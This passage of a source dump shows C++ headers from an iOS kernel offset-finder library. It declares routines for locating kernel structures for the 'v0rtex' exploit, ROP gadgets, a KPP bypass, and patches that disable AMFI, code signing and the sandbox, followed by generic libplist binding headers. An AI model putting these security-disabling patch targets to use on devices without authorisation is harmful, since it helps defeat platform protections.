is_stp(uint32_t i); 63 | static bool is_movz(uint32_t i); 64 | static bool is_bcond(uint32_t i); 65 | static bool is_b(uint32_t i); 66 | static bool is_nop(uint32_t i); 67 | 68 | public: //type 69 | enum type{ 70 | unknown, 71 | adrp, 72 | adr, 73 | bl, 74 | cbz, 75 | ret, 76 | tbnz, 77 | add, 78 | br, 79 | ldr, 80 | cbnz, 81 | movk, 82 | orr, 83 | tbz, 84 | ldxr, 85 | ldrb, 86 | str, 87 | stp, 88 | movz, 89 | bcond, 90 | b, 91 | nop 92 | }; 93 | enum subtype{ 94 | st_general, 95 | st_register, 96 | st_immediate, 97 | st_literal 98 | }; 99 | enum supertype{ 100 | sut_general, 101 | sut_branch_imm 102 | }; 103 | enum cond{ 104 | NE = 000, 105 | EG = 000, 106 | CS = 001, 107 | CC = 001, 108 | MI = 010, 109 | PL = 010, 110 | VS = 011, 111 | VC = 011, 112 | HI = 100, 113 | LS = 100, 114 | GE = 101, 115 | LT = 101, 116 | GT = 110, 117 | LE = 110, 118 | AL = 111 119 | }; 120 | type type(); 121 | subtype subtype(); 122 | supertype supertype(); 123 | int64_t imm(); 124 | uint8_t rd(); 125 | uint8_t rn(); 126 | uint8_t rt(); 127 | uint8_t other(); 128 | public: //cast operators 129 | operator void*(); 130 | operator loc_t(); 131 | operator enum type(); 132 | }; 133 | 134 | loc_t find_literal_ref(segment_t segemts, loc_t pos, int ignoreTimes = 0); 135 | loc_t find_rel_branch_source(insn bdst, bool searchUp, int ignoreTimes=0, int limit = 0); 136 | 137 | }; 138 | }; 139 | 140 | 141 | #endif /* insn_hpp */ 142 | -------------------------------------------------------------------------------- /liboffsetfinder64/liboffsetfinder64.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // offsetfinder64.hpp 3 | // offsetfinder64 4 | // 5 | // Created by tihmstar on 10.01.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef offsetfinder64_hpp 10 | #define offsetfinder64_hpp 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | namespace tihmstar { 26 | class offsetfinder64 { 27 | public: 28 | enum tristate{ 29 | kfalse = 0, 30 | ktrue = 1, 31 | kuninitialized = 2 32 | }; 33 | private: 34 | bool _freeKernel; 35 | uint8_t *_kdata; 36 | size_t _ksize; 37 | patchfinder64::loc_t _kernel_entry; 38 | std::vector _segments; 39 | tristate _haveSymtab = kuninitialized; 40 | 41 | using loc_t = patchfinder64::loc_t; 42 | struct { 43 | loc_t _gPhysBase; 44 | loc_t _kernel_pmap; 45 | loc_t _cpacr_write; 46 | loc_t _idlesleep_str_loc; 47 | loc_t _deepsleep_str_loc; 48 | patchfinder64::patch _i_can_has_debugger_patch_off; 49 | std::vector _nosuid_off; 50 | patchfinder64::patch _remount_patch_offset; 51 | patchfinder64::patch _lwvm_patch_offsets; 52 | patchfinder64::patch _proc_enforce; 53 | patchfinder64::patch _amfi_patch_offsets; 54 | patchfinder64::patch _cs_enforcement_disable_amfi; 55 | patchfinder64::patch _amfi_substrate_patch; 56 | patchfinder64::patch _nonceEnabler_patch; 57 | patchfinder64::loc_t _sbops; 58 | loc_t _release_arm; 59 | patchfinder64::loc_t _bcopy; 60 | }; 61 | 62 | struct symtab_command *__symtab; 63 | void loadSegments(); 64 | __attribute__((always_inline)) struct symtab_command *getSymtab(); 65 | 66 | public: 67 | offsetfinder64(const char *filename); 68 | offsetfinder64(void* buf, size_t size); 69 | const void *kdata(); 70 | patchfinder64::loc_t find_entry(); 71 | const std::vector &segments(){return _segments;}; 72 | bool haveSymbols(); 73 | 74 | patchfinder64::loc_t memmem(const void *little, size_t little_len); 75 | 76 | patchfinder64::loc_t find_sym(const char *sym); 77 | patchfinder64::loc_t find_syscall0(); 78 | uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0); 79 | 80 | /*------------------------ v0rtex -------------------------- */ 81 | patchfinder64::loc_t find_zone_map(); 82 | patchfinder64::loc_t find_kernel_map(); 83 | patchfinder64::loc_t find_kernel_task(); 84 | patchfinder64::loc_t find_realhost(); 85 | patchfinder64::loc_t find_bzero(); 86 | patchfinder64::loc_t _find_bcopy(); 87 | patchfinder64::loc_t find_copyout(); 88 | patchfinder64::loc_t find_copyin(); 89 | patchfinder64::loc_t find_ipc_port_alloc_special(); 90 | patchfinder64::loc_t find_ipc_kobject_set(); 91 | patchfinder64::loc_t find_ipc_port_make_send(); 92 | patchfinder64::loc_t find_chgproccnt(); 93 | patchfinder64::loc_t find_kauth_cred_ref(); 94 | patchfinder64::loc_t find_osserializer_serialize(); 95 | patchfinder64::loc_t _find_release_arm(); 96 | uint32_t find_vtab_get_external_trap_for_index(); 97 | uint32_t find_vtab_get_retain_count(); 98 | uint32_t find_iouserclient_ipc(); 99 | uint32_t find_ipc_space_is_task(); 100 | uint32_t find_proc_ucred(); 101 | uint32_t find_task_bsd_info(); 102 | uint32_t find_vm_map_hdr(); 103 | uint32_t find_task_itk_self(); 104 | uint32_t find_task_itk_registered(); 105 | uint32_t find_sizeof_task(); 106 | 107 | patchfinder64::loc_t find_rop_add_x0_x0_0x10(); 108 | patchfinder64::loc_t find_rop_add_x0_x0_0x40(); 109 | patchfinder64::loc_t find_rop_ldr_x0_x0_0x10(); 110 | patchfinder64::loc_t find_IOMalloc(); 111 | patchfinder64::loc_t find_IOFree(); 112 | 113 | /*------------------------ kernelpatches -------------------------- */ 114 | patchfinder64::patch _find_i_can_has_debugger_patch_off(); 115 | patchfinder64::patch _find_lwvm_patch_offsets(); 116 | patchfinder64::patch _find_remount_patch_offset(); 117 | std::vector _find_nosuid_off(); 118 | patchfinder64::patch _find_proc_enforce(); 119 | patchfinder64::patch _find_amfi_patch_offsets(); 120 | patchfinder64::patch _find_cs_enforcement_disable_amfi(); 121 | patchfinder64::patch _find_amfi_substrate_patch(); 122 | patchfinder64::patch find_sandbox_patch(); 123 | patchfinder64::loc_t _find_sbops(); 124 | patchfinder64::patch _find_nonceEnabler_patch(); 125 | patchfinder64::patch find_nonceEnabler_patch_nosym(); 126 | 127 | inline std::vector all_patches() { 128 | return { 129 | find_i_can_has_debugger_patch_off(), 130 | find_remount_patch_offset(), 131 | find_lwvm_patch_offsets(), 132 | _nosuid_off.at(0), 133 | _nosuid_off.at(1), 134 | find_proc_enforce(), 135 | find_amfi_patch_offsets(), 136 | find_cs_enforcement_disable_amfi(), 137 | find_amfi_substrate_patch(), 138 | find_nonceEnabler_patch() 139 | }; 140 | } 141 | 142 | 143 | /*------------------------ KPP bypass -------------------------- */ 144 | patchfinder64::loc_t _find_gPhysBase(); 145 | patchfinder64::loc_t _find_kernel_pmap(); 146 | patchfinder64::loc_t find_kernel_pmap_nosym(); 147 | patchfinder64::loc_t _find_cpacr_write(); 148 | patchfinder64::loc_t _find_idlesleep_str_loc(); 149 | patchfinder64::loc_t _find_deepsleep_str_loc(); 150 | 151 | inline patchfinder64::loc_t linker_base() { 152 | return (loc_t)0xfffffff007004000; 153 | } 154 | 155 | inline patchfinder64::loc_t find_bcopy() { 156 | return _bcopy; 157 | } 158 | inline patchfinder64::loc_t find_gPhysBase() { 159 | return _gPhysBase; 160 | } 161 | inline patchfinder64::loc_t find_kernel_pmap() { 162 | return _kernel_pmap; 163 | } 164 | inline patchfinder64::loc_t find_cpacr_write() { 165 | return _cpacr_write; 166 | } 167 | inline patchfinder64::loc_t find_idlesleep_str_loc() { 168 | return _idlesleep_str_loc; 169 | } 170 | inline patchfinder64::loc_t find_deepsleep_str_loc() { 171 | return _deepsleep_str_loc; 172 | } 173 | inline const patchfinder64::patch &find_i_can_has_debugger_patch_off() const { 174 | return _i_can_has_debugger_patch_off; 175 | } 176 | inline patchfinder64::patch find_lwvm_patch_offsets() { 177 | return _lwvm_patch_offsets; 178 | } 179 | constexpr inline const patchfinder64::patch &find_remount_patch_offset() const { 180 | return _remount_patch_offset; 181 | } 182 | constexpr inline const std::vector &find_nosuid_off() const { 183 | return _nosuid_off; 184 | } 185 | inline patchfinder64::patch find_proc_enforce() { 186 | return _proc_enforce; 187 | } 188 | inline patchfinder64::patch find_amfi_patch_offsets() { 189 | return _amfi_patch_offsets; 190 | } 191 | inline patchfinder64::patch find_cs_enforcement_disable_amfi() { 192 | return _cs_enforcement_disable_amfi; 193 | } 194 | inline patchfinder64::patch find_amfi_substrate_patch() { 195 | return _amfi_substrate_patch; 196 | } 197 | constexpr inline patchfinder64::loc_t find_sbops() const { 198 | return _sbops; 199 | } 200 | inline patchfinder64::patch find_nonceEnabler_patch() { 201 | return _nonceEnabler_patch; 202 | } 203 | inline patchfinder64::loc_t find_release_arm() { 204 | return _release_arm; 205 | } 206 | 207 | /*------------------------ Util -------------------------- */ 208 | patchfinder64::loc_t find_rootvnode(); 209 | 210 | ~offsetfinder64(); 211 | }; 212 | } 213 | 214 | 215 | 216 | #endif /* offsetfinder64_hpp */ 217 | -------------------------------------------------------------------------------- /liboffsetfinder64/patch.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // patch.cpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #include "liboffsetfinder64/patch.hpp" 10 | 11 | using namespace tihmstar::patchfinder64; 12 | 13 | patch::patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uintptr_t slide)) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){ 14 | _patch = malloc(_patchSize); 15 | memcpy((void*)_patch, patch, _patchSize); 16 | _slideme = (_slidefunc) ? true : false; 17 | } 18 | 19 | patch::patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize), _slideme(cpy._slideme), _slidefunc(cpy._slidefunc) { 20 | _patch = malloc(_patchSize); 21 | memcpy((void*)_patch, cpy._patch, _patchSize); 22 | } 23 | 24 | patch::patch(patch &&cpy) : _location(cpy._location), _patchSize(cpy._patchSize), _patch(cpy._patch), _slideme(cpy._slideme), _slidefunc(cpy._slidefunc) { 25 | cpy._patch = nullptr; 26 | } 27 | 28 | void patch::slide(uintptr_t slide) { 29 | if (!_slideme) 30 | return; 31 | printf("sliding with %p\n",(void*)slide); 32 | _slidefunc(this,slide); 33 | _slideme = false; //only slide once 34 | } 35 | 36 | patch::patch() : _location(0), _patch(nullptr), _patchSize(0) {} 37 | 38 | patch &patch::operator=(const patch &p) { 39 | free((void*)_patch); 40 | this->_patch = malloc(p._patchSize); 41 | memcpy((void*)this->_patch, (void*)p._patch, p._patchSize); 42 | this->_location = p._location; 43 | this->_patchSize = p._patchSize; 44 | this->_slideme = p._slideme; 45 | this->_slidefunc = p._slidefunc; 46 | return *this; 47 | } 48 | 49 | patch &patch::operator=(patch &&p) { 50 | free((void*)_patch); 51 | this->_patch = p._patch; 52 | p._patch = nullptr; 53 | this->_location = p._location; 54 | this->_patchSize = p._patchSize; 55 | this->_slideme = p._slideme; 56 | this->_slidefunc = p._slidefunc; 57 | return *this; 58 | } 59 | 60 | patch::~patch(){ 61 | free((void*)_patch); 62 | } 63 | -------------------------------------------------------------------------------- /liboffsetfinder64/patch.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // patch.hpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef patch_hpp 10 | #define patch_hpp 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | namespace tihmstar { 18 | namespace patchfinder64{ 19 | 20 | class patch{ 21 | bool _slideme; 22 | void(*_slidefunc)(class patch *patch, uintptr_t slide); 23 | public: 24 | loc_t _location; 25 | void *_patch; 26 | size_t _patchSize; 27 | patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uintptr_t slide) = NULL); 28 | patch(const patch& cpy); 29 | patch(patch &&cpy); 30 | void slide(uintptr_t slide); 31 | patch &operator=(const patch &p); 32 | patch &operator=(patch &&p); 33 | patch(); 34 | ~patch(); 35 | }; 36 | 37 | } 38 | } 39 | 40 | #endif /* patch_hpp */ 41 | -------------------------------------------------------------------------------- /plist/Array.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Array.h 3 | * Array node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_ARRAY_H 23 | #define PLIST_ARRAY_H 24 | 25 | #include 26 | #include 27 | 28 | namespace PList 29 | { 30 | 31 | class Array : public Structure 32 | { 33 | public : 34 | Array(Node* parent = NULL); 35 | Array(plist_t node, Node* parent = NULL); 36 | Array(const Array& a); 37 | Array& operator=(Array& a); 38 | virtual ~Array(); 39 | 40 | Node* Clone() const; 41 | 42 | Node* operator[](unsigned int index); 43 | void Append(Node* node); 44 | void Insert(Node* node, unsigned int pos); 45 | void Remove(Node* node); 46 | void Remove(unsigned int pos); 47 | unsigned int GetNodeIndex(Node* node) const; 48 | 49 | private : 50 | std::vector _array; 51 | }; 52 | 53 | }; 54 | 55 | #endif // PLIST_ARRAY_H 56 | -------------------------------------------------------------------------------- /plist/Boolean.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Boolean.h 3 | * Boolean node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_BOOLEAN_H 23 | #define PLIST_BOOLEAN_H 24 | 25 | #include 26 | 27 | namespace PList 28 | { 29 | 30 | class Boolean : public Node 31 | { 32 | public : 33 | Boolean(Node* parent = NULL); 34 | Boolean(plist_t node, Node* parent = NULL); 35 | Boolean(const Boolean& b); 36 | Boolean& operator=(Boolean& b); 37 | Boolean(bool b); 38 | virtual ~Boolean(); 39 | 40 | Node* Clone() const; 41 | 42 | void SetValue(bool b); 43 | bool GetValue() const; 44 | }; 45 | 46 | }; 47 | 48 | #endif // PLIST_BOOLEAN_H 49 | -------------------------------------------------------------------------------- /plist/Data.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Data.h 3 | * Data node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_DATA_H 23 | #define PLIST_DATA_H 24 | 25 | #include 26 | #include 27 | 28 | namespace PList 29 | { 30 | 31 | class Data : public Node 32 | { 33 | public : 34 | Data(Node* parent = NULL); 35 | Data(plist_t node, Node* parent = NULL); 36 | Data(const Data& d); 37 | Data& operator=(Data& d); 38 | Data(const std::vector& buff); 39 | virtual ~Data(); 40 | 41 | Node* Clone() const; 42 | 43 | void SetValue(const std::vector& buff); 44 | std::vector GetValue() const; 45 | }; 46 | 47 | }; 48 | 49 | #endif // PLIST_DATA_H 50 | -------------------------------------------------------------------------------- /plist/Date.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Date.h 3 | * Date node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_DATE_H 23 | #define PLIST_DATE_H 24 | 25 | #include 26 | #include 27 | #include 28 | 29 | namespace PList 30 | { 31 | 32 | class Date : public Node 33 | { 34 | public : 35 | Date(Node* parent = NULL); 36 | Date(plist_t node, Node* parent = NULL); 37 | Date(const Date& d); 38 | Date& operator=(Date& d); 39 | Date(timeval t); 40 | virtual ~Date(); 41 | 42 | Node* Clone() const; 43 | 44 | void SetValue(timeval t); 45 | timeval GetValue() const; 46 | }; 47 | 48 | }; 49 | 50 | #endif // PLIST_DATE_H 51 | -------------------------------------------------------------------------------- /plist/Dictionary.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Dictionary.h 3 | * Dictionary node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_DICTIONARY_H 23 | #define PLIST_DICTIONARY_H 24 | 25 | #include 26 | #include 27 | #include 28 | 29 | namespace PList 30 | { 31 | 32 | class Dictionary : public Structure 33 | { 34 | public : 35 | Dictionary(Node* parent = NULL); 36 | Dictionary(plist_t node, Node* parent = NULL); 37 | Dictionary(const Dictionary& d); 38 | Dictionary& operator=(Dictionary& d); 39 | virtual ~Dictionary(); 40 | 41 | Node* Clone() const; 42 | 43 | typedef std::map::iterator iterator; 44 | 45 | Node* operator[](const std::string& key); 46 | iterator Begin(); 47 | iterator End(); 48 | iterator Find(const std::string& key); 49 | iterator Set(const std::string& key, const Node* node); 50 | iterator Set(const std::string& key, const Node& node); 51 | iterator Insert(const std::string& key, Node* node) PLIST_WARN_DEPRECATED("use Set() instead"); 52 | void Remove(Node* node); 53 | void Remove(const std::string& key); 54 | std::string GetNodeKey(Node* key); 55 | 56 | private : 57 | std::map _map; 58 | 59 | 60 | }; 61 | 62 | }; 63 | 64 | #endif // PLIST_DICTIONARY_H 65 | -------------------------------------------------------------------------------- /plist/Integer.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Integer.h 3 | * Integer node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_INTEGER_H 23 | #define PLIST_INTEGER_H 24 | 25 | #include 26 | 27 | namespace PList 28 | { 29 | 30 | class Integer : public Node 31 | { 32 | public : 33 | Integer(Node* parent = NULL); 34 | Integer(plist_t node, Node* parent = NULL); 35 | Integer(const Integer& i); 36 | Integer& operator=(Integer& i); 37 | Integer(uint64_t i); 38 | virtual ~Integer(); 39 | 40 | Node* Clone() const; 41 | 42 | void SetValue(uint64_t i); 43 | uint64_t GetValue() const; 44 | }; 45 | 46 | }; 47 | 48 | #endif // PLIST_INTEGER_H 49 | -------------------------------------------------------------------------------- /plist/Key.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Key.h 3 | * Key node type for C++ binding 4 | * 5 | * Copyright (c) 2012 Nikias Bassen, All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_KEY_H 23 | #define PLIST_KEY_H 24 | 25 | #include 26 | #include 27 | 28 | namespace PList 29 | { 30 | 31 | class Key : public Node 32 | { 33 | public : 34 | Key(Node* parent = NULL); 35 | Key(plist_t node, Node* parent = NULL); 36 | Key(const Key& s); 37 | Key& operator=(Key& s); 38 | Key(const std::string& s); 39 | virtual ~Key(); 40 | 41 | Node* Clone() const; 42 | 43 | void SetValue(const std::string& s); 44 | std::string GetValue() const; 45 | }; 46 | 47 | }; 48 | 49 | #endif // PLIST_KEY_H 50 | -------------------------------------------------------------------------------- /plist/Node.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Node.h 3 | * Abstract node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_NODE_H 23 | #define PLIST_NODE_H 24 | 25 | #include 26 | #include 27 | 28 | namespace PList 29 | { 30 | 31 | class Node 32 | { 33 | public : 34 | virtual ~Node(); 35 | 36 | virtual Node* Clone() const = 0; 37 | 38 | Node * GetParent() const; 39 | plist_type GetType() const; 40 | plist_t GetPlist() const; 41 | 42 | static Node* FromPlist(plist_t node, Node* parent = NULL); 43 | 44 | protected: 45 | Node(Node* parent = NULL); 46 | Node(plist_t node, Node* parent = NULL); 47 | Node(plist_type type, Node* parent = NULL); 48 | plist_t _node; 49 | 50 | private: 51 | Node* _parent; 52 | friend class Structure; 53 | }; 54 | 55 | }; 56 | 57 | #endif // PLIST_NODE_H 58 | -------------------------------------------------------------------------------- /plist/Real.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Real.h 3 | * Real node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_REAL_H 23 | #define PLIST_REAL_H 24 | 25 | #include 26 | 27 | namespace PList 28 | { 29 | 30 | class Real : public Node 31 | { 32 | public : 33 | Real(Node* parent = NULL); 34 | Real(plist_t node, Node* parent = NULL); 35 | Real(const Real& d); 36 | Real& operator=(Real& d); 37 | Real(double d); 38 | virtual ~Real(); 39 | 40 | Node* Clone() const; 41 | 42 | void SetValue(double d); 43 | double GetValue() const; 44 | }; 45 | 46 | }; 47 | 48 | #endif // PLIST_REAL_H 49 | -------------------------------------------------------------------------------- /plist/String.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * String.h 3 | * String node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_STRING_H 23 | #define PLIST_STRING_H 24 | 25 | #include 26 | #include 27 | 28 | namespace PList 29 | { 30 | 31 | class String : public Node 32 | { 33 | public : 34 | String(Node* parent = NULL); 35 | String(plist_t node, Node* parent = NULL); 36 | String(const String& s); 37 | String& operator=(String& s); 38 | String(const std::string& s); 39 | virtual ~String(); 40 | 41 | Node* Clone() const; 42 | 43 | void SetValue(const std::string& s); 44 | std::string GetValue() const; 45 | }; 46 | 47 | }; 48 | 49 | #endif // PLIST_STRING_H 50 | -------------------------------------------------------------------------------- /plist/Structure.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Structure.h 3 | * Structure node type for C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_STRUCTURE_H 23 | #define PLIST_STRUCTURE_H 24 | 25 | #include 26 | #include 27 | #include 28 | 29 | namespace PList 30 | { 31 | 32 | class Structure : public Node 33 | { 34 | public : 35 | virtual ~Structure(); 36 | 37 | uint32_t GetSize() const; 38 | 39 | std::string ToXml() const; 40 | std::vector ToBin() const; 41 | 42 | virtual void Remove(Node* node) = 0; 43 | 44 | static Structure* FromXml(const std::string& xml); 45 | static Structure* FromBin(const std::vector& bin); 46 | 47 | protected: 48 | Structure(Node* parent = NULL); 49 | Structure(plist_type type, Node* parent = NULL); 50 | void UpdateNodeParent(Node* node); 51 | 52 | private: 53 | Structure(Structure& s); 54 | Structure& operator=(const Structure& s); 55 | }; 56 | 57 | }; 58 | 59 | #endif // PLIST_STRUCTURE_H 60 | -------------------------------------------------------------------------------- /plist/Uid.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Uid.h 3 | * Uid node type for C++ binding 4 | * 5 | * Copyright (c) 2012 Nikias Bassen, All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * 